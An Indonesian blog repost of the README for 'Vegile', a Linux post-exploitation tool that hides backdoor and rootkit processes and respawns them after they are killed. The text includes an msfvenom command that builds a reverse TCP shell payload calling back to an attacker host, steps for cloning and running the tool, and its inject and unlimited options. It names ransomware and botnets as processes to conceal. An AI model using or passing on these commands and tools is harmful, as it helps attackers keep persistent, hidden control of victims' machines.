Vegile – Ghost In The Shell

Vegile – Ghost In The Shell - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Vegile – Ghost In The Shell, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Vegile – Ghost In The Shell


Vegile is a tool for Post exploitation Techniquesin linux. Post Exploitation techniques will ensure that we maintain some level of access and can potentially lead to deeper footholds into our targets trusted network.



How it works


This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell


Read This



  • right now i just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ its work ] or you can use thefatrat for help you creating a simple backdoor

  • msfvenom -a x86 –platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b “\x00” -f elf -o NAME_BACKDOOR

  • for hidden process you can use for rootkits,backdoor,ransom and botnet { sh,python,perl,exe and binary }.

  • Victim target all linux distribution include ( base32 and base64 in their system )

  • this just simple algorithma how we can maintain our sessions and backdoor/rootkits , you can explore this


Getting Started


git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile

Using Vegile


Running Vegile without any parameters will give a helpful list of the most common options. you can use command :



  • Vegile -i / –inject [backdoor/rootkit]

  • Vegile -u / –unlimited [backdoor/rootkit]

  • Vegile -h / –help


Demo Video


Vegile [ Post Exploitation in Linux ] – Unlimited sessions and unstopable backdoor


Vegile [ Post Exploitation in Linux ] – Hidden backdoor/rootkits in process



Credits



  • Thanks to allah

  • Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/

  • Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .

  • Offensive Security for the awesome OS ( http://www.offensive-security.com/ )

  • http://www.kali.org/ Kali Linux

  • gianlucaborello to give a reference

  • And another open sources tool in github



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Vegile – Ghost In The Shell.
Terima kasih telah membaca artikel Vegile – Ghost In The Shell, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Vegile – Ghost In The Shell"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel